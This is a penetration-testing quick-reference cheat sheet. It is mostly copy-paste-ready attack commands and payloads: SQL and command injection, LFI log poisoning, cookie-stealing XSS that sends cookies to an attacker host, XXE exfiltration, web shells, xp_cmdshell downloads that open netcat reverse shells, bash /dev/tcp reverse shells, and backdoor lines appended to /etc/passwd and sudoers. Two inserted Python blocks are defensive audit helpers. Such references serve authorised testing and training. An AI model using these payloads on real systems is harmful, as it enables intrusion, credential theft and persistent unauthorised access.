CIPHER ULTIMATE PENETRATION TESTING QUICK-REFERENCE
Compiled from: PayloadsAllTheThings, HackTricks, OSCP repos, AD exploitation guides, PEASS-ng, Blue Team Notes.
Every entry is copy-paste-ready. Replace <LHOST>, <RHOST>, <LPORT>, <RPORT>, <USER>, <PASS>, <DOMAIN>, <DC_IP> with engagement values.
Last updated: 2026-03-14
TABLE OF CONTENTS
- Recon (Passive + Active)
- Scanning & Service Enumeration
- Web Exploitation
- Linux Privilege Escalation
- Windows Privilege Escalation
- Active Directory
- Pivoting & Tunneling
- File Transfer Methods
- Reverse Shells
- Password Attacks
- Post-Exploitation
- Persistence
1. RECON (PASSIVE + ACTIVE)
1.1 Passive Reconnaissance
Subdomain Enumeration
theHarvester -f results.json -b baidu,certspotter,crtsh,duckduckgo,hackertarget,otx,rapiddns,urlscan,yahoo -l 500 -d <DOMAIN>
jq -r '.hosts[]' results.json | sort -uf | tee subdomains.txt
jq -r '.emails // empty | .[]' results.json | sort -uf | tee emails.txt
subfinder -t 10 -timeout 3 -nW -o subfinder.txt -d <DOMAIN>
amass enum -o amass.txt -d <DOMAIN>
amass intel -o amass_asn.txt -asn <ASN_NUMBER>
amass intel -o amass_cidr.txt -cidr <CIDR>
assetfinder --subs-only <DOMAIN> | grep -v '*' | tee assetfinder.txt
sublist3r -o sublist3r.txt -d <DOMAIN>
curl -s "https://crt.sh/?q=%25.<DOMAIN>&output=json" | jq -r '.[].name_value' | sort -u
dmitry -wines -o dmitry.txt <DOMAIN>
whois <DOMAIN>
whois <IP>
shodan search "hostname:<DOMAIN>"
shodan host <IP>
cewl http://<RHOST> -m 6 -w cewl_wordlist.txt
Subdomain Validation
while read -r sub; do
res=$(dig "${sub}" -t A +noall +comments +timeout=3 | grep -Po '(?<=status: )[^,\s]+')
echo "${sub} | ${res}"
done < subdomains.txt | sort -uf | tee subdomain_status.txt
grep 'NOERROR' subdomain_status.txt | grep -Po '[^\s]+(?= \|)' | sort -uf > live_subdomains.txt
cat subdomains.txt | httpx -silent -status-code -title -tech-detect -o httpx.txt
1.2 Active Reconnaissance
DNS Enumeration
dig +noall +answer -t AXFR <DOMAIN> @<NS_SERVER>
dnsrecon -t axfr -d <DOMAIN>
host -t axfr <DOMAIN> <NS_SERVER>
dig +noall +answer -t NS <DOMAIN>
dig +noall +answer -t MX <DOMAIN>
dig +noall +answer -t ANY <DOMAIN> @<NS_SERVER>
dig +noall +answer -t TXT <DOMAIN>
dig +noall +answer -x <IP>
dnsrecon --iw -f --threads 50 --lifetime 3 -t brt -D /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -d <DOMAIN>
fierce --domain <DOMAIN>
fierce --domain <DOMAIN> --subdomain-file /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
Network Discovery
arp-scan -l
netdiscover -r <CIDR>
nmap -sn <CIDR>
fping -a -g <CIDR> 2>/dev/null
traceroute <RHOST>
2. SCANNING & SERVICE ENUMERATION
2.1 Nmap
Core Scans
sudo nmap -sC -sV -O -oA nmap/initial <RHOST>
sudo nmap -p- --min-rate 10000 -oA nmap/alltcp <RHOST>
sudo nmap -sC -sV -p <PORTS> -oA nmap/targeted <RHOST>
sudo nmap -sU --top-ports 20 -oA nmap/udp <RHOST>
sudo nmap -sU -p- --min-rate 5000 -oA nmap/alludp <RHOST>
sudo nmap --script vuln -p <PORTS> -oA nmap/vuln <RHOST>
sudo nmap -v -sT -A -T4 -p- -Pn --script vuln -oA nmap/aggressive <RHOST>
proxychains nmap -sT -Pn -sV <RHOST>
Nmap Scripts
nmap --script smb-enum-shares,smb-enum-users,smb-os-discovery -p 139,445 <RHOST>
nmap --script smb-vuln-* -p 139,445 <RHOST>
nmap --script http-enum,http-headers,http-methods,http-title -p 80,443 <RHOST>
nmap --script ftp-anon,ftp-bounce,ftp-vsftpd-backdoor -p 21 <RHOST>
nmap --script smtp-enum-users,smtp-vuln-* -p 25 <RHOST>
nmap -sU --script snmp-brute,snmp-info -p 161 <RHOST>
nmap -p 88 --script=krb5-enum-users --script-args="krb5-enum-users.realm='<DOMAIN>'" <RHOST>
nmap --script dns-brute --script-args dns-brute.domain=<DOMAIN> <RHOST>
Masscan
masscan -p1-65535,U:1-65535 --rate=1000 <RHOST> -e tun0 --router-ip <GATEWAY>
2.2 Service Enumeration
FTP (21)
ftp <RHOST>
ftp -A <RHOST>
nmap --script ftp-anon -p 21 <RHOST>
wget -r ftp://anonymous:anonymous@<RHOST>/
SSH (22)
ssh <USER>@<RHOST>
ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 <USER>@<RHOST>
ssh -o PreferredAuthentications=password <USER>@<RHOST>
chmod 600 id_rsa
ssh -i id_rsa <USER>@<RHOST>
SMTP (25)
nc -nvvC <RHOST> 25
smtp-user-enum -M VRFY -U /usr/share/seclists/Usernames/Names/names.txt -t <RHOST>
echo "VRFY <USER>" | nc -nv <RHOST> 25
DNS (53)
dig @<RHOST> <DOMAIN> any
dig @<RHOST> <DOMAIN> axfr
dnsrecon -d <DOMAIN> -n <RHOST>
HTTP/HTTPS (80/443)
gobuster dir -u http://<RHOST> -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt,bak -t 50
feroxbuster -u http://<RHOST> -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -x php,html,txt
ffuf -w /usr/share/seclists/Discovery/Web-Content/common.txt -u http://<RHOST>/FUZZ -mc 200,301,302,403
wfuzz -w /usr/share/wordlists/dirb/common.txt --hc 404 http://<RHOST>/FUZZ
dirsearch -u http://<RHOST> -e php,html,js,txt
ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u http://<RHOST> -H "Host: FUZZ.<DOMAIN>" -fs <SIZE>
gobuster vhost -u http://<RHOST> -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
whatweb http://<RHOST>
nikto -host http://<RHOST>
wappalyzer (browser extension)
curl http://<RHOST>/robots.txt
curl http://<RHOST>/sitemap.xml
POP3 (110)
telnet <RHOST> 110
USER <USER>
PASS <PASS>
LIST
RETR 1
RPCbind/NFS (111/2049)
rpcinfo -p <RHOST>
showmount -e <RHOST>
mount -t nfs <RHOST>:/<SHARE> /mnt -o nolock
mount -t nfs -o vers=3 <RHOST>:/<SHARE> /mnt
SMB (139/445)
enum4linux -a <RHOST>
enum4linux-ng <RHOST>
smbclient -L //<RHOST> -N
smbclient //<RHOST>/<SHARE> -U <USER>
smbmap -H <RHOST>
smbmap -H <RHOST> -u <USER> -p <PASS> -R
rpcclient -U "" -N <RHOST>
rpcclient -U "<USER>%<PASS>" <RHOST>
rpcclient $> srvinfo
rpcclient $> enumdomains
rpcclient $> querydominfo
rpcclient $> enumdomusers
rpcclient $> enumdomgroups
rpcclient $> getdompwinfo
rpcclient $> querydispinfo
rpcclient $> queryuser 0x3e8
crackmapexec smb <RHOST> -u <USER> -p <PASS> --shares
crackmapexec smb <RHOST> -u <USER> -p <PASS> --users
crackmapexec smb <RHOST> -u <USER> -p <PASS> -x "whoami"
crackmapexec smb <CIDR> -u <USER> -p <PASS>
smbget -R smb://<RHOST>/<SHARE>
SNMP (161)
snmpwalk -c public -v1 <RHOST>
snmpwalk -c public -v2c <RHOST> 1.3.6.1.2.1.25.4.2.1.2
snmpwalk -c public -v2c <RHOST> 1.3.6.1.4.1.77.1.2.25
snmpwalk -c public -v2c <RHOST> 1.3.6.1.2.1.6.13.1.3
onesixtyone <RHOST> -c /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt
snmp-check <RHOST>
LDAP (389/636)
nmap -p 389 -n -sV --script "ldap* and not brute" <RHOST>
ldapsearch -x -H ldap://<RHOST> -b "dc=<DC1>,dc=<DC2>"
ldapsearch -x -H ldap://<RHOST> -D "<USER>@<DOMAIN>" -w '<PASS>' -b "dc=<DC1>,dc=<DC2>"
ldapdomaindump <RHOST> -u '<DOMAIN>\<USER>' -p '<PASS>'
MSSQL (1433)
impacket-mssqlclient <DOMAIN>/<USER>:<PASS>@<RHOST> -windows-auth
sqsh -S <RHOST> -U <USER> -P <PASS>
EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
EXEC xp_cmdshell 'whoami';
MySQL (3306)
mysql -u <USER> -p<PASS> -h <RHOST>
mysql> SELECT @@version;
mysql> SHOW DATABASES;
mysql> SELECT LOAD_FILE('/etc/passwd');
mysql> SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE '/var/www/html/shell.php';
PostgreSQL (5432)
psql -h <RHOST> -U <USER> -d <DB>
DROP TABLE IF EXISTS cmd_exec;
CREATE TABLE cmd_exec(cmd_output text);
COPY cmd_exec FROM PROGRAM 'id';
SELECT * FROM cmd_exec;
DROP TABLE IF EXISTS cmd_exec;
RDP (3389)
xfreerdp /u:<USER> /p:<PASS> /v:<RHOST> /dynamic-resolution +clipboard
rdesktop <RHOST> -u <USER> -p <PASS>
WinRM (5985/5986)
evil-winrm -i <RHOST> -u <USER> -p '<PASS>'
evil-winrm -i <RHOST> -u <USER> -H <NTLM_HASH>
VNC (5900)
vncviewer <RHOST>::<PORT>
3. WEB EXPLOITATION
3.1 SQL Injection
Authentication Bypass
' OR '1'='1'--
' OR '1'='1'/*
' OR 1=1--
' OR 1=1
admin'--
admin' OR '1'='1'
' OR 1=1 LIMIT 1--
') OR ('1'='1'
UNION-Based Injection
' ORDER BY 1-- -
' ORDER BY 2
' ORDER BY 3-- -
' UNION SELECT NULL,NULL,NULL
' UNION SELECT username,password FROM users-- -
' UNION SELECT NULL,database(),user(),@@version,NULL
' UNION SELECT NULL,table_name,NULL FROM information_schema.tables WHERE table_schema=database()-- -
' UNION SELECT NULL,column_name,NULL FROM information_schema.columns WHERE table_name='users'
Error-Based Injection
' AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT version()),0x7e))-- -
' AND UPDATEXML(1,CONCAT(0x7e,(SELECT user()),0x7e),1)
' AND 1=CONVERT(int,(SELECT @@version))-- -
' AND 1=CONVERT(int,(SELECT TOP 1 table_name FROM information_schema.tables))
' AND 1=CAST((SELECT version()) AS int)
Blind Injection (Boolean)
' AND 1=1-- - (true)
' AND 1=2
' AND LENGTH(database())=N-- -
' AND ASCII(SUBSTRING(database(),1,1))>64
' AND (SELECT COUNT(*) FROM users)>0
Blind Injection (Time-Based)
' AND SLEEP(5)-- -
' AND IF(1=1,SLEEP(5),0)
' AND IF(ASCII(SUBSTRING(database(),1,1))>64,SLEEP(5),0)-- -
-- MSSQL
'; WAITFOR DELAY '0:0:5'
'; IF (1=1) WAITFOR DELAY '0:0:5'-- -
-- PostgreSQL
'; SELECT pg_sleep(5)
' AND (SELECT CASE WHEN (1=1) THEN pg_sleep(5) ELSE pg_sleep(0) END)
Stacked Queries
'; EXEC xp_cmdshell 'whoami'-- -
'; EXEC xp_cmdshell 'certutil.exe -urlcache -split -f http://<LHOST>/nc.exe C:\temp\nc.exe'
'; EXEC xp_cmdshell 'C:\temp\nc.exe <LHOST> <LPORT> -e cmd.exe'
Out-of-Band (OOB)
SELECT LOAD_FILE('\\\\<BURP_COLLAB>\\a');
SELECT ... INTO OUTFILE '\\\\<BURP_COLLAB>\\a';
EXEC master..xp_dirtree '\\<BURP_COLLAB>\a';
EXEC master..xp_subdirs '\\<BURP_COLLAB>\a';
WAF Bypass Techniques
UnIoN SeLeCt
%252f%252a*/UNION%252f%252a*/SELECT
UNIONSELECT
UNION%09SELECT
UNION%0ASELECT
SQLMap
sqlmap -u "http://<RHOST>/page?id=1" --batch --dbs
sqlmap -u "http://<RHOST>/page?id=1" -D <DB> --tables
sqlmap -u "http://<RHOST>/page?id=1" -D <DB> -T <TABLE> --dump
sqlmap -u "http://<RHOST>/page?id=1" --os-shell
sqlmap -u "http://<RHOST>/page?id=1" --os-cmd "whoami"
sqlmap -r request.txt --batch --dbs
sqlmap -u "http://<RHOST>/page?id=1" --tamper=space2comment --level=5 --risk=3
sqlmap -u "http://<RHOST>/page?id=1" --proxy=http://127.0.0.1:8080
3.2 Command Injection
Basic Payloads
; whoami
| whoami
|| whoami
& whoami
&& whoami
`whoami`
$(whoami)
%0awhoami
%0a whoami
%0d%0a whoami
Filter Bypass
cat${IFS}/etc/passwd
{cat,/etc/passwd}
cat</etc/passwd
cat$IFS/etc/passwd
X=$'cat\x20/etc/passwd'&&$X
w'h'o'am'i
w"h"o"am"i
wh``oami
wh\oami
${HOME:0:1}etc${HOME:0:1}passwd
cat ${PATH%%u*}etc${PATH%%u*}passwd
c\at /e\tc/p\asswd
c''at /e''tc/p''asswd
c""at /e""tc/p""asswd
echo -e "\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64" | xargs cat
cat $(echo -e "\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64")
echo "Y2F0IC9ldGMvcGFzc3dk" | base64 -d | sh
$(echo Y2F0IC9ldGMvcGFzc3dk | base64 -d)
Blind Command Injection
; sleep 5
| sleep 5
& ping -c 5 127.0.0.1 &
; curl http://$(whoami).<BURP_COLLAB>
; nslookup $(whoami).<BURP_COLLAB>
; for i in $(ls /); do host "$i.<BURP_COLLAB>"; done
Windows Command Injection
& whoami
| whoami
; dir
%0a dir
# Variable substring bypass
ping%CommonProgramFiles:~10,-18%127.0.0.1
3.3 File Inclusion (LFI/RFI)
LFI Payloads
http://<RHOST>/page?file=../../../etc/passwd
http://<RHOST>/page?file=....//....//....//etc/passwd
http://<RHOST>/page?file=..%2f..%2f..%2fetc%2fpasswd
http://<RHOST>/page?file=../../../etc/passwd%00
http://<RHOST>/page?file=../../../etc/passwd%00.php
http://<RHOST>/page?file=%252e%252e%252fetc%252fpasswd
http://<RHOST>/page?file=%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
http://<RHOST>/page?file=../../../etc/passwd.......................
http://<RHOST>/page?file=..///////..////..//////etc/passwd
http://<RHOST>/page?file=/%5C../%5C../%5C../etc/passwd
PHP Wrappers
http://<RHOST>/page?file=php://filter/convert.base64-encode/resource=index.php
http://<RHOST>/page?file=php://input
POST DATA: <?php system('whoami'); ?>
http://<RHOST>/page?file=data://text/plain,<?php system('whoami'); ?>
http://<RHOST>/page?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCd3aG9hbWknKTsgPz4=
http://<RHOST>/page?file=expect://whoami
Log Poisoning (LFI to RCE)
curl -A "<?php system(\$_GET['cmd']); ?>" http://<RHOST>/
http://<RHOST>/page?file=../../../var/log/apache2/access.log&cmd=whoami
ssh '<?php system($_GET["cmd"]); ?>'@<RHOST>
http://<RHOST>/page?file=../../../var/log/auth.log&cmd=whoami
telnet <RHOST> 25
MAIL FROM:<<?php system($_GET['cmd']); ?>>
http://<RHOST>/page?file=../../../var/log/mail.log&cmd=whoami
Useful LFI Files
/etc/passwd
/etc/shadow
/etc/hosts
/etc/crontab
/etc/ssh/sshd_config
/home/<USER>/.ssh/id_rsa
/home/<USER>/.bash_history
/proc/self/environ
/proc/self/cmdline
/proc/self/fd/<N>
/var/log/apache2/access.log
/var/log/auth.log
C:\Windows\System32\config\SAM
C:\Windows\System32\config\SYSTEM
C:\Windows\repair\SAM
C:\Windows\win.ini
C:\inetpub\wwwroot\web.config
C:\inetpub\logs\LogFiles\
C:\Users\<USER>\.ssh\id_rsa
RFI Payloads
http://<RHOST>/page?file=http://<LHOST>/shell.txt
http://<RHOST>/page?file=http://<LHOST>/shell.txt%00
http://<RHOST>/page?file=\\<LHOST>\share\shell.php
3.4 XSS (Cross-Site Scripting)
Basic Payloads
<script>alert(1)</script>
<img src=x onerror=alert(1)>
<svg onload=alert(1)>
<body onload=alert(1)>
<input onfocus=alert(1) autofocus>
<marquee onstart=alert(1)>
<details open ontoggle=alert(1)>
<video src=x onerror=alert(1)>
<audio src=x onerror=alert(1)>
Filter Bypass
<ScRiPt>alert(1)</ScRiPt>
<scr<script>ipt>alert(1)</scr</script>ipt>
<img src=x onerror="alert(1)">
<img src=x onerror=alert`1`>
<svg/onload=alert(1)>
<svg onload=alert(1)>
javascript:alert(1)
javas%09cript:alert(1)
Cookie Stealing
<script>document.location='http://<LHOST>/?c='+document.cookie</script>
<script>new Image().src='http://<LHOST>/?c='+document.cookie</script>
<img src=x onerror="fetch('http://<LHOST>/?c='+document.cookie)">
Polyglot
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%%0telerik%0telerik11telerik/telerik/telerik/telerik'telerik"2telerik>telerik<telerik3telerik/telerik/script&telerik--!>telerik<script/*/telerik%0telerik*/alert()/telerik/script>
3.5 SSRF (Server-Side Request Forgery)
Localhost Bypass
http://127.0.0.1
http://localhost
http://0.0.0.0
http://[::1]
http://[::ffff:127.0.0.1]
http://2130706433
http://0x7f000001
http://0177.0.0.1
http://127.1
http://127.0.1.3
http://localtest.me
http://127.0.0.1.nip.io
http://169.254.169.254/latest/meta-data/
http://169.254.169.254/latest/meta-data/iam/security-credentials/
http://169.254.169.254/latest/user-data
http://metadata.google.internal/computeMetadata/v1/
http://169.254.169.254/metadata/instance?api-version=2021-02-01
http://169.254.169.254/metadata/v1/
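Added example (not part of the original cheat sheet): a defender-side check that canonicalises the host of an outbound URL before an SSRF allow/deny decision, so every loopback and metadata spelling in the list above is treated as the same address. It uses only the Python standard library; the sample URLs are constructed from the list above, and the names `classify`, `canonical_ip` and `is_internal` are this example's own.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

# Constructed test inputs: alternate spellings from the list above plus two
# ordinary hostnames.
SAMPLE_URLS = [
    "http://127.0.0.1", "http://0.0.0.0", "http://[::1]",
    "http://[::ffff:127.0.0.1]", "http://2130706433", "http://0x7f000001",
    "http://0177.0.0.1", "http://127.1",
    "http://169.254.169.254/latest/meta-data/",
    "http://localhost", "http://example.com",
]


def canonical_ip(host):
    """Return an ipaddress object for any literal IPv4/IPv6 spelling, or None
    when the host is a name that still needs DNS resolution."""
    try:
        # inet_aton accepts the legacy forms most HTTP clients also accept:
        # plain integer, hex, octal octets and the a.b / a.b.c shorthand.
        packed = socket.inet_aton(host)
        return ipaddress.ip_address(socket.inet_ntoa(packed))
    except OSError:
        pass
    try:
        return ipaddress.ip_address(host)  # IPv6 literal (brackets already removed)
    except ValueError:
        return None


def is_internal(ip):
    """True for addresses that point at the host itself, link-local/metadata
    ranges, or private space (IPv4-mapped IPv6 is unwrapped first)."""
    if isinstance(ip, ipaddress.IPv6Address) and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped
    return (ip.is_loopback or ip.is_unspecified or ip.is_link_local
            or ip.is_private or ip.is_reserved)


def classify(url):
    """'block' for literal internal addresses, 'resolve' for hostnames that
    must be resolved and re-checked against is_internal() before fetching,
    'allow' for public literals."""
    host = urlsplit(url).hostname or ""
    ip = canonical_ip(host)
    if ip is None:
        return "resolve"
    return "block" if is_internal(ip) else "allow"


if __name__ == "__main__":
    for u in SAMPLE_URLS:
        print(f"{classify(u):8} {u}")
```

The important design point is that the check runs on the canonical address, not on the string the user supplied, and that a hostname result is never an allow: the resolved address must go through the same `is_internal()` test (and the fetch should pin that address, otherwise a DNS answer can change between check and use).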
Protocol Smuggling
file:///etc/passwd
dict://attacker:11111/
gopher://localhost:25/_MAIL%20FROM:<h@x>
gopher://localhost:6379/_SET%20pwned%20true
sftp://evil.com:11111/
3.6 File Upload
Bypass Techniques
shell.php → shell.php5, shell.php7, shell.pht, shell.phtml, shell.phps, shell.phar
shell.asp → shell.aspx, shell.ashx, shell.asmx
shell.jsp → shell.jspx, shell.jsw, shell.jsv
shell.php.jpg
shell.php.png
shell.jpg.php
shell.php%00.jpg
shell.php\x00.jpg
shell.pHp
shell.PhP
Change Content-Type to: image/jpeg, image/png, image/gif
GIF89a; <?php system($_GET['cmd']); ?>
AddType application/x-httpd-php .evil
Web Shells
<?php system($_GET['cmd']); ?>
<?php echo shell_exec($_GET['cmd']); ?>
<?php passthru($_GET['cmd']); ?>
<?=`$_GET[0]`?>
3.7 XML External Entity (XXE)
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>&xxe;</root>
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "http://<LHOST>">
]>
<root>&xxe;</root>
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY % xxe SYSTEM "http://<LHOST>/evil.dtd">
%xxe;
]>
<root>test</root>
<!-- evil.dtd, served from http://<LHOST>/evil.dtd -->
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY % exfil SYSTEM 'http://<LHOST>/?x=%file;'>">
%eval;
%exfil;
3.8 SSTI (Server-Side Template Injection)
{{7*7}}
${7*7}
<%= 7*7 %>
*{7*7}
{{config.items()}}
{{''.__class__.__mro__[2].__subclasses__()}}
{{''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read()}}
{{config.__class__.__init__.__globals__['os'].popen('id').read()}}
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}
3.9 Deserialization
java -jar ysoserial.jar CommonsCollections1 'ping <LHOST>' | base64
O:8:"stdClass":1:{s:4:"test";s:2:"id";}
import pickle, os, base64

class RCE:
    # pickle calls __reduce__ on load; the returned callable runs at unpickle time
    def __reduce__(self):
        return (os.system, ('id',))

print(base64.b64encode(pickle.dumps(RCE())))
ysoserial.exe -g TypeConfuseDelegate -f Json.Net -c "whoami" -o raw
4. LINUX PRIVILEGE ESCALATION
4.1 Enumeration
uname -a
cat /etc/os-release
cat /proc/version
lsb_release -a
arch
dpkg --print-architecture
hostname
ip a
ifconfig
route -n
ss -tulnp
netstat -tulnp
arp -a
cat /etc/hosts
cat /etc/resolv.conf
env
echo $PATH
cat /etc/profile
cat ~/.bashrc
User & Permission Enumeration
id
whoami
groups
cat /etc/passwd
cat /etc/shadow
cat /etc/group
cat /etc/sudoers
sudo -l
last
w
who
Automated Enumeration
curl -L https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh | sh
./LinEnum.sh -s -k keyword -r report -e /tmp/ -t
./lse.sh -l1
./pspy64 -pf -i 1000
4.2 SUID/SGID Exploitation
find / -perm -4000 -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -perm -2000 -type f 2>/dev/null
find / -perm -6000 -type f 2>/dev/null
/usr/bin/find . -exec /bin/sh -p \;
/usr/bin/vim -c ':!/bin/sh'
/usr/bin/nmap --interactive
nmap> !sh
/usr/bin/python3 -c 'import os; os.execl("/bin/sh", "sh", "-p")'
/usr/bin/env /bin/sh -p
/usr/bin/bash -p
/usr/bin/cp /etc/passwd /tmp/passwd.bak
4.3 Capabilities
/usr/bin/getcap -r / 2>/dev/null
/usr/bin/python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'
/usr/bin/tar czf /tmp/shadow.tar.gz /etc/shadow
tar xzf /tmp/shadow.tar.gz
tcpdump -i any -w capture.pcap
4.4 Sudo Abuse
sudo -l
sudo vim -c '!sh'
sudo awk 'BEGIN {system("/bin/sh")}'
sudo find / -exec /bin/sh \;
sudo mysql -e '! /bin/sh'
sudo gdb -nx -ex '!sh' -ex quit
sudo python3 -c 'import os; os.system("/bin/bash")'
sudo perl -e 'exec "/bin/sh";'
sudo ruby -e 'exec "/bin/sh"'
sudo less /etc/passwd
sudo man man
sudo ftp
sudo env /bin/sh
sudo ed
sudo nmap --interactive
gcc -fPIC -shared -nostartfiles -o /tmp/shell.so /tmp/shell.c
sudo LD_PRELOAD=/tmp/shell.so <ALLOWED_COMMAND>
sudo -u
sudoedit -s '\' $(python3 -c 'print("A"*1000)')
4.5 Cron Jobs
crontab -l
cat /etc/crontab
ls -la /etc/cron.d/
ls -la /etc/cron.daily/
ls -la /etc/cron.hourly/
ls -la /var/spool/cron/crontabs/
systemctl list-timers --all
./pspy64 -pf -i 1000
echo 'bash -i >& /dev/tcp/<LHOST>/<LPORT> 0>&1' >> /path/to/cron/script.sh
cd /path/to/cron/dir
echo "" > "--checkpoint=1"
echo "" > "--checkpoint-action=exec=sh shell.sh"
echo "bash -i >& /dev/tcp/<LHOST>/<LPORT> 0>&1" > shell.sh
4.6 Writable Files
openssl passwd -1 -salt hacker hacker123
echo 'hacker:$1$hacker$HASH:0:0:Hacker:/root:/bin/bash' >> /etc/passwd
echo 'hacker::0:0::/root:/bin/bash' >> /etc/passwd
su hacker
mkpasswd -m sha-512 newpassword
echo "<USER> ALL=(ALL:ALL) ALL" >> /etc/sudoers
echo "<USER> ALL=NOPASSWD: ALL" >> /etc/sudoers
find / -writable -type f ! -path "/proc/*" ! -path "/sys/*" 2>/dev/null
find / -perm -2 -type f 2>/dev/null
find / -user root -perm -002 -type f 2>/dev/null
4.7 NFS no_root_squash
showmount -e <RHOST>
mkdir /tmp/nfs
mount -t nfs <RHOST>:/<SHARE> /tmp/nfs -o nolock
cp /bin/bash /tmp/nfs/bash
chmod +s /tmp/nfs/bash
/tmp/nfs/bash -p
4.8 Kernel Exploits
uname -r
./linux-exploit-suggester.sh
./les.sh
4.9 Docker/LXD Breakout
docker run -v /:/host -it ubuntu chroot /host /bin/bash
docker run --rm -it --pid=host --net=host --privileged -v /:/host ubuntu bash
lxc image import ./alpine.tar.gz --alias myimage
lxc init myimage mycontainer -c security.privileged=true
lxc config device add mycontainer mydevice disk source=/ path=/mnt/root recursive=true
lxc start mycontainer
lxc exec mycontainer /bin/sh
4.10 Shared Library Hijacking
readelf -d <BINARY> | grep RPATH
readelf -d <BINARY> | grep RUNPATH
strace <BINARY> 2>&1 | grep "No such file"
ldd <BINARY>
gcc -shared -fPIC -o <LIBNAME>.so /tmp/evil.c
4.11 Password Hunting
grep -rnw '/' -ie "PASSWORD" --color=always 2>/dev/null
grep -rnw '/' -ie "password" --include="*.conf" 2>/dev/null
find / -name "*.bak" -o -name "*.old" -o -name "*.conf" 2>/dev/null
find / -name id_rsa 2>/dev/null
find / -name authorized_keys 2>/dev/null
cat ~/.bash_history
cat /var/log/auth.log 2>/dev/null
4.12 SSH Key Exploitation
find / -name id_rsa 2>/dev/null
find / -name "*.key" 2>/dev/null
find / -name authorized_keys 2>/dev/null
chmod 600 id_rsa
ssh -i id_rsa <USER>@<RHOST>
5. WINDOWS PRIVILEGE ESCALATION
5.1 Enumeration
systeminfo
hostname
whoami /all
whoami /priv
whoami /groups
net user
net user <USER>
net localgroup
net localgroup Administrators
wmic qfe list brief
wmic os get Caption,Version,BuildNumber
wmic logicaldisk get caption,description
set
echo %PATH%
Network
ipconfig /all
route print
arp -a
netstat -ano
netsh firewall show state
netsh advfirewall show allprofiles
Services & Processes
tasklist /v
tasklist /svc
wmic service list brief
sc query
sc qc <SERVICE>
wmic process list brief
net start
Scheduled Tasks
schtasks /query /fo LIST /v
schtasks /query /fo TABLE /nh
Installed Software
wmic product get name,version
dir "C:\Program Files"
dir "C:\Program Files (x86)"
reg query HKLM\SOFTWARE
Automated Enumeration
# WinPEAS
.\winPEASany.exe
.\winPEASx64.exe
# PowerUp
powershell -ep bypass -c "Import-Module .\PowerUp.ps1; Invoke-AllChecks"
# Seatbelt
.\Seatbelt.exe -group=all
# Windows Exploit Suggester
python3 wes.py systeminfo.txt
5.2 Service Misconfigurations
Unquoted Service Paths
# Find
wmic service get name,displayname,pathname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """
# Exploit: place binary in unquoted path gap
# E.g., C:\Program Files\Vuln Service\service.exe
# Place: C:\Program.exe or C:\Program Files\Vuln.exe
icacls "C:\Program Files\Vuln Service"
copy shell.exe "C:\Program Files\Vuln.exe"
sc stop <SERVICE>
sc start <SERVICE>
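Added example (not part of the original cheat sheet): an audit helper that takes the `wmic service get name,pathname,startmode` output the finder above produces and, for each unquoted ImagePath containing spaces, lists the executables Windows would look for before the intended one (it splits on every space, as the comment above describes). An auditor then checks each candidate's parent directory for write access by non-admin users. The sample output is constructed, and `unquoted_candidates` and `find_unquoted_services` are this example's own names; stdlib only.

```python
import re

# Constructed sample in the shape of `wmic service get name,pathname,startmode`
# output (column spacing is cosmetic).
WMIC_OUTPUT = """\
Name      PathName                                         StartMode
VulnSvc   C:\\Program Files\\Vuln Service\\service.exe         Auto
Spooler   C:\\Windows\\System32\\spoolsv.exe                   Auto
GoodSvc   "C:\\Program Files\\Good Service\\good.exe" -run     Auto
"""


def unquoted_candidates(image_path):
    """Return, in lookup order, the paths tried for an unquoted ImagePath
    that contains spaces; [] if the path is quoted or has no spaces."""
    image_path = image_path.strip()
    if image_path.startswith('"'):
        return []
    # Only the part up to the first *.exe is the binary; the rest is arguments.
    m = re.search(r'^(.*?\.exe)(\s|$)', image_path, re.IGNORECASE)
    if not m:
        return []
    binary = m.group(1)
    if " " not in binary:
        return []
    parts = binary.split(" ")
    # Each prefix that ends at a space is tried as "<prefix>.exe" first.
    return [" ".join(parts[:i]) + ".exe" for i in range(1, len(parts))]


def find_unquoted_services(wmic_text):
    """Parse wmic-style output; return {service: [candidate paths]} for every
    service whose ImagePath is subject to the unquoted-path lookup."""
    findings = {}
    for line in wmic_text.splitlines()[1:]:   # skip the header row
        if not line.strip():
            continue
        name, rest = line.split(None, 1)
        path = rest.rsplit(None, 1)[0]          # drop the StartMode column
        if path.lower().startswith("c:\\windows\\"):
            continue                             # same exclusion as the finder
        cands = unquoted_candidates(path)
        if cands:
            findings[name] = cands
    return findings


if __name__ == "__main__":
    for svc, cands in find_unquoted_services(WMIC_OUTPUT).items():
        print(svc)
        for c in cands:
            print("  check write access on parent of:", c)
```

The fix for a finding is to quote the ImagePath (`sc config <SERVICE> binpath= "\"C:\path with spaces\service.exe\""`) and to ensure no standard user can write to any directory along the path.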
